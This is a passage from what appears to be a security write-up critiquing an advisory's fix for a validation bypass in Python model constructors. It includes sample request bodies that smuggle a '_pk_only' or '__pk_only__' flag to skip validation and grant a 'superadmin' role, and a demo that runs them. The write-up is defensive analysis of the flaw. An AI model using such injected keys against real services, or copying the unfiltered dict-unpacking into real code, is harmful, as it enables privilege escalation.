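    """The advisory's suggested fix: a keyword-only _pk_only parameter.
    A request key named __pk_only__ now stays in kwargs and fails validation,
    but a request key named _pk_only still binds the parameter under **."""

    def __init__(self, *, _pk_only: bool = False, **kwargs: Any) -> None:
        self.__dict__.update(kwargs if _pk_only else validate(kwargs))


def from_untrusted(cls: type, body: dict) -> Any:
    """Construct from a request body, dropping every key that is not a
    declared field before unpacking. This closes the _pk_only path that the
    keyword-only signature alone leaves open."""
    return cls(**{k: v for k, v in body.items() if k in FIELDS})


# Constructed request bodies.
HONEST = {"id": 1, "name": "alice", "role": "user"}
DUNDER_INJECT = {"__pk_only__": True, "id": "not-an-int", "role": "superadmin"}
KWONLY_INJECT = {"_pk_only": True, "id": "not-an-int", "role": "superadmin"}


def outcome(cls: type, body: dict, guard: bool = False) -> Any:
    """Return the instance's stored fields, or the exception name when
    validation rejected the body."""
    try:
        inst = from_untrusted(cls, body) if guard else cls(**body)
        return dict(vars(inst))
    except ValueError as exc:
        return type(exc).__name__


if __name__ == "__main__":
    print("vulnerable, __pk_only__ key :", outcome(VulnerableModel, DUNDER_INJECT))
    print("kw-only fix, __pk_only__ key:", outcome(KwOnlyModel, DUNDER_INJECT))
    print("kw-only fix, _pk_only key   :", outcome(KwOnlyModel, KWONLY_INJECT))
    print("kw-only fix + key filter    :", outcome(KwOnlyModel, KWONLY_INJECT, guard=True))
```

The third line of output is the point the advisory's closing claim misses: a keyword-only parameter is only unreachable when the caller does not unpack an attacker-controlled dict into the constructor. Filtering the body down to declared fields (or `extra='forbid'` at the validation layer, once the flag no longer bypasses it) is what actually removes the injection path.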